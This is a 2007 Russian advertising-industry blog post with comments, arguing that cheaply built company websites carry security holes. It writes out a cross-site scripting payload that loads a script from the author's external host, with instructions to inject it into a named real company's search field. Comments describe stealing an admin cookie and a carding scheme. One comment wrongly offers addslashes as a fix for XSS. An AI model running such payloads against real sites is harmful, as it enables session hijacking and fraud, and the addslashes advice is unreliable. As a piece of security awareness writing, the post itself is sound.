Блоги

Для рекламистов и анонимных комментаторов о качестве сайтов.

В продолжение недавней истории о сайте «Максидома». Краткое содержание предыдущей серии: вместо того, чтобы признать дефект на сайте, Общество Анонимных Комментаторов поставило под сомнение справедливость моих слов (и еще много чего другого). Мол, вывели на страницу слово «ой», так это дальше ничем не грозит.

Специально для вас, уважаемые читатели, я подготовил более наглядную демонстрацию того, к чему может привести недостаточная квалификация или лень разработчиков. За примерами ходить далеко не пришлось. Вы догадываетесь, в чьем портфолио я достал пару сайтов для экзекуции? Это было нетрудно.
Нажмите на ссылку и подождите секунд пять. Остальное прочитаете уже там. Потом вернитесь сюда и дочитайте текст до конца.

Начать шоу.

Какое отношение это имеет к рекламе?

Имеет. Точно такое же, какое имеют к рекламе (и не только) сайты и интернет вообще. У кого-то сомнения?
Во-первых, рекламные агентства частенько заказывают сайты субподрядчикам или даже сами делают их. В лучшем случае это будет «полиграфическая болезнь», когда сайт похож на буклет и нефункционален. А что, у нас же есть свои дизайнеры, какая разница: сайт или флаер?

Во-вторых, рекламодатели заказывают сайты и недоумевают, когда им озвучивают цифру в несколько тысяч у.е. Зачем платить 4000 долларов, когда есть конторки, массово штампующие такие сайты по штуке баксов? У некоторых в портфолио бывают довольно известные заказчики (как они туда угодили, другой вопрос).

У большинства клиентов или рекламных агентств нет осознания, за что платить 4000 баксов, заказывая сайт: «Вот листовок напечатать или щит у дороги заказать, это понятно. А сайт не пощупаешь. Да что там мудрить, каждый школьник ведь себе сайт уже сделал. И ваще, нам ентот интырнет тока для галочки, потому что на визитке напечатано».

При этом находятся люди, утверждающие, что «ничего страшного» и задающие вопросы «а чем плох данный сайт». Да, пока у вас не похитили пароль, базу клиентов, не разослали с вашего сайта спам или вирусы, то ничего страшного ? Можете продолжать называть это «функциональностью, недоступной моему пониманию», или принимать это за «вирусный маркетинг», это нынче модно.

Когда идет обсуждение вывески, читатели AdLife знают про щели, образующиеся на стыках при перепаде температур. Но почему-то, когда показывают щели в интернет-сайтах, появляются вопросы: «А чем это плохо?»

Добавки?
Хотите узнать, как выявить подобные уязвимости на своем сайте? Тогда продолжим. Есть в Питере известная IT-компания Ramec. Откройте в новом окне ссылку http://www.ramec.ru. Введите в строку поиска нижеследующий текст и нажмите Enter, да подождите секунд пять ;)

< script src="h**p://drnovikov.ru/ramec/xss.js">< /script>

(Уберите пробелы перед "script" и "/script" и замените "*" на "t")

Догадаетесь с трех раз, кто творец? Подсказка скрыта в коде страницы.

Перед тем, как комментировать, ознакомьтесь с альтернативными источниками, в которых подробно описано, почему это не «функциональность», а уязвимость аж с 1997 года:

http://team-madalf.com/index.php?act=Print&client=printer&f=42&t=7739
http://cf-team.net/content/view/15/30/
http://www.cgisecurity.com/articles/xss-faq.shtml

Ситуация, когда посторонний может запустить на страницах вашего сайта чужеродный скрипт, недопустима! И обсуждать тут нечего.

Надеюсь, теперь рекламисты будут уделять побольше внимания вопросам качества сайтов, в том числе их безопасности.

Внимание! В 13:00 здесь же состоится еще одна демонстрация. Приходите, вам понравится.


P.S.


Общество Анонимных Комментаторов может начинать изливать свои… мнения. Расскажите мне, что у меня «недостаточно квалификации, чтобы тут писать», «нет человеческих качеств» и т.п. Специально для того, чтобы вы не беспокоились понапрасну: да, я ни в чем не разбираюсь, у меня нет человеческих качеств, вы делаете классные сайты, а блоги у меня не идут. И вообще, это гнусный самопиар. После того, как отстреляетесь, помойте руки и быстро за книжки да в интернет. Учиться делать нормальные сайты.

Обсуждение

Алексей Новиков // 12 февраля 2007 — 08:30:37

Всех анонимов распугал чтоль

Андрей_М // 12 февраля 2007 — 09:04:15

Алексей, чем конкретнее материал, тем труднее сказать что-то по теме. :-)
Позиция понятна, я лично ее поддерживаю. Добавил бы, что даже сделанные НОРМАЛЬНО сайты зачастую не поддерживаются отделом рекламы (маркетинга) и скорее показывают непрофессионализм сотрудников, чем служат инструментом маркетинга.

Смирнов Виктор // 12 февраля 2007 — 09:10:28

Забавно -)

80527 // 12 февраля 2007 — 09:43:51

опер-группа на выезд....

Алексей Новиков // 12 февраля 2007 — 09:45:16

Приближается время демонстрации. Такого на страницах Adlife вы еще не видели, точно говорю. Около 13:00 будьте здесь.

Алексей Новиков // 12 февраля 2007 — 10:18:25

Кстати, рекламисты! Если у вас Internet Explorer или Opera, посмотрите на логотип Adlie наверху этой странички ;) А теперь нажмите на него и наслаждайтесь.

Алексей Новиков // 12 февраля 2007 — 10:07:30

Да, еще пройдите и посмотрите на баннеры наверху в блоге Куприянова, в заметке "дяденька дай порулить"
http://adlife.spb.ru/blog/?pageid=2&blog=102934&id=113978?rand=125410742

Kate // 12 февраля 2007 — 10:11:56

Ого! Верно подмечено, Док :))

Алексей Новиков // 12 февраля 2007 — 10:16:33

Да, примечание. Чтобы увидеть, надо подождать после загрузки секунд 5-10

mackbenak // 12 февраля 2007 — 10:20:52

Наверное, действительно распугали!
Не могу говорить за всех.
По поводу Вашего профессионализма с моей стороны пены не было:)
ok, думаю другие тоже смогли в этом убедиться.
Но предыдущие Ваши блоги так или иначе говорят о том, что лучше занимаейтесь сайтами и дальше.

Алексей Новиков // 12 февраля 2007 — 10:34:40

Mackbenak: по поводу других блогов. Мой основной блог сейчас на втором месте на sovetnik.ru ну и еще пара сотен RSS-подписчиков + пара сотен уников в день. Будь все плохо, не читали бы, правда? ;-)

Буду признателен, если вместо "все плохо" будет конструктивная критика. Например, с чем именно Вы несогласны в предыдущих постах? :-)

mackbenak // 12 февраля 2007 — 11:54:16

На самом деле критика была вся в постах по Вашим блогам.
Да и потом, посмотрите сами, кто кроме меня Вам ответил?
Смекаете?

Алексей Новиков // 12 февраля 2007 — 12:05:45

Неа, не смекаю. Когда есть что-то конкретное, не говорят обычно "да ты кто ваще такой". Аргументов, подтверждающих мою неправоту, я еще не встречал, хотя был бы признателен.

Алексей Новиков // 12 февраля 2007 — 12:54:06

Поразительно! Спустя несколько лет и несколько часов они залатали-таки дыры. Для тех, кто не успел на концерт: при заходе на эти сайты по сформированной мною ссылке люди видели вот это: http://drnovikov.ru/xss/

axel // 12 февраля 2007 — 14:29:08

так а в чем заключается уязвимость? если бы этот скрипт торачал в контенте тогда да, а так это уязвимость работает в том случает если кто то пройдет по оставленной тобою ссылкой. имхо много дыма без огня. запугивание людей далеких от программирования

Алексей Новиков // 12 февраля 2007 — 14:42:46

В 13:05 была еще одна демонстрация, в которой я скрипт внедрял в контент (предварительно созвонившись с хозяевами сайта) Кто успел, увидел своими глазами, что можно натворить.

axel, Вы очередной аноним из Волекса?

В тексте статьи я привел три ссылки на то, как при помощи показанных мной методов заполучить админский доступ к сайту. Вы читали? Понимаю, читать неохота. Проще сказать «а в чем заключается уязвимость». Как думаете, если при помощи XSS реально ломают сайты, то есть уязвимость? Подбросить ссылку дело лишь времени. Можно даже ссылку давать не на этот сайт, а на другой, который сделает автоматом нужный редирект.

Можно прислать ее мылом девочке-контентщице, сказав «смотри, у тебя на этой странице ужас». Она пойдет, откроет и все, мы заполучили что нам надо.

В том-то и дело, что XSS не обязательно внедрять в сайт. Он «внедряется» не на сервере, а у клиента. Уязвимости разные бывают, только не все конторы знают о них. Наверное, надо было сделать такю демонстрацию на сайте Максидома, да прислать ссылку их генеральному.

cout // 12 февраля 2007 — 23:34:00

Читая ответы, медленно сползаю под стол!! Господа!! Те, которые считают что данная УЯЗВИМОСТЬ совсем не ошибка в коде, а примочка позволяющая манагерам … ЛЯЛЯЛЯ…
Рассказываю:
Тандем из скрипт хакера и кардера может за счет данной УЯЗВИМОСТИ обеспечить себе безбедное существование. КАК? А ВОТ КАК!!!
Подменяем адрес из каталога (каталог, наша продукция, товары…) на аналогичную страницу на которой доп сервис – «купи в инете со скидкой», «купи прямо сейчас» и тд =>> выбор товара =>> вводим кред карту, WM, YAденьги, PP =>> если карта то покупаем что-нибудь в инете или берем кард ридер…=>> обналичиваем =>> живем безбедно :))
Вариантов 1001

peter // 14 февраля 2007 — 15:14:13

С одной стороны, автор прав, а вот с другой нет!
Начну с того, в чём не прав:
1. Нет смысла небольшим агентствам и фирмам, вкладывать большие суммы в двогло сайтов, так как это бессмысленно. Неужели ты думаешь (автор) что сайты мелких фирм и агентств, будут хакать? Если ты так думаешь, то ты ничего в этом не понимаешь. Конечно, есть начинающие, которые на таких сайтах тренируются, но тут достаточно самой банальной защиты! (риплейса, и замены php, html тегов)! Этого более чем достаточно! Если сайт юзает мускул, то в принципе, этого тоже достаточно, ну может ещё пару финтов добавить не более! Работы на 10-20 минут. И такой сайт уже будет сложно взломать, так как там всё будет самописное, и уверяю тебя, такой движок, не стоит более 500-800$ остальное пойдёт на дизайн, вот тут речь отдельная, это трогать не будем!
2. Если на сайт нацелится хакер или злоумышленник, то хакнуть можно любого, поверь!)))) Существует много способов, даже в том случае, если ты свой сайт защитишь! Давай представим, что твой сайт защищён и лежит на виртуальном серваке! Допустим я попробовал его хакнуть, у меня не получилось. Но на сервере не один сайт?) и не все они защищены?) вот тебе и дыра, причём вселенского масштаба! Значит нужно ставить свой сервак, а это ещё $$$$$ и не малые! Но и в этом случае можно сломать, например ДОС-атаки ? просто перегрузить нафиг и всё!
В общем, способов много! Вот в этом, я не согласен с автором!
Согласен в том:
Да, нужно вкладывать деньги в разработку движков, причём не CMS а самописных, но это не стоит 4000$ не смеши меня! Это же не портал!))

peter // 14 февраля 2007 — 15:16:43

Да, нужно вкладывать деньги в разработку движков, причём не CMS а самописных, но это не стоит 4000$ не смеши меня! Это же не портал!))

И помните «храните деньги в сберегательной кассе!» проще говоря, не надо хранить важную инфу на сайтах, а если храните, то делайте бекап, хотя бы раз в месяц!

На мой взгляд, автор явно не подготовился к статье!)
Кстати, что бы не прошёл такой запрос, который показал автор, достаточно написать вот так
addslashes($_POST['запрос']);

в вашем случае, это просто лень кодера!

Diablo_ // 14 февраля 2007 — 15:29:08

Алексей Новиков Харе себя пиарить! Ты себе что ли цену набиваешь?:) Твоя статья, это не что иное, как бред! да, ты показал мелкие примочки, но это же детский сад! Такими запросами, можно сломать только сайты, тобой написанные!:)

Алексей Новиков // 14 февраля 2007 — 20:23:54

Peter, я не свожу сайт к движку. Там много чего есть, здесь я обращаю внимание лишь на один аспект. Нормальный сайт не для мини-конторы должен стоить нормальных денег. Порталы знаете сколько стоят? Реальные, а не местячковые игрушки? Вот под 200000 долларов, например, один из проектов. И это только первый этап инвестиций.

Про бекап Вы правы. Сломать можно все, что угодно. Ваше право на собственное мнение уважаю, но Вы неправы ;) У меня не было цели написать всеобъемлющую и подробную статью для гиков. Для тех целей, которые я преследую, вполне достаточно.

Насчет лени кодера согласен. Именно так и образуется половина всех дыр.

Diablo, ну не Вас же пиарить ;-) Смысл статьи и заключается в том, что даже я при помощи такого «детского сада» могу вызвать нежелательные явления на сайте. К слову, это не все, что я демонстрировал. Вы на ту демонстрацию просто не попали. Да, еще я не «пишу сайты». Привет «пиарщикам РИА "B*****"».

Dablo_ // 14 февраля 2007 — 22:05:20

Алексей если вы не пишите сайты, то откуда же вам знать, что где и как стоит?! На счёт 200 000$ это вы очень загнули!!!!!!!!!! максимум 20 000$!!!! это только двигло, а остальное наверное на зарплату тратите и дизайн!?:))
Сайт нужен сводить именно к движку, так как это 90% всего! А контент наполнить и дизайн сделать это небольшая проблема! В начале то пишется движок, а потом всё остальное.
[code]Там много чего есть[/code]
Там больше ничего нету!:) Если человек говорит про дыры, то он имеет ввиду движок и только его!
Я совершенно не хочу вас обидеть! Но у меня складывается впечатление, что вы мало понимаете в программировании!
Кстати, если не секрет, вы случайно не знаете сколько с максидома за это «чудо» содрали.

Алексей Новиков // 14 февраля 2007 — 22:41:39

Dablo, для того, чтобы знать что сколько стоит в производстве автомобилей, обязательно работать слесарем на конвейере? Сдается мне, что слесарь знает об этом меньше.

Точно так же и у программиста своя работа, а у меня своя ;-)

Скажу Вам по большому секрету, я практически ничего в программировании не понимаю. Но это не страшно. Вы же тоже немного понимаете в маркетинге, назвали баг на сайте «точным маркетинговым ходом» :-) не обижайтесь.

Если уж я, почти ничего в программировании не понимающий, сделал такие штуки, то что сможет понимающий тогда?! Вот то-то. Кстати, понимающие-то мне сказали, что куку админскую увести проще простого таким способом, мы даже потренировались. Сделали тестовый сайт, на нем повесили (не взламывая) скрипт, увели куку и получили админский доступ. Если это не страшно, то я просто даже не знаю, что Вам дальше говорить.

Движок это 10% сайта. И дизайн это процентов 10, и все прочие вещи. Главное это его идея (особенно если это сервис) и маркетинговая составляющая. О ней я подробнее как-нибудь напишу.

Сведите-ка к движку vz.ru, например. Посмотрим, как у Вас получится решить «небольшую проблему» с контентом, аудиторией и т.п.

Новости

 30   декабря 14:50:43Итоги 2010 года в лицах 1 (1)
 29   декабря 12:11:37Oblako поработало руками (6)
 15   декабря 11:33:14LabelAble поиграл в кубики (13)

Обсуждения

Используете ли вы ненормативную лексику на рабочем месте?

Постоянно

Иногда

Всё зависит от заказчика/агентства, с которым работаю

В крайних случаях

Никогда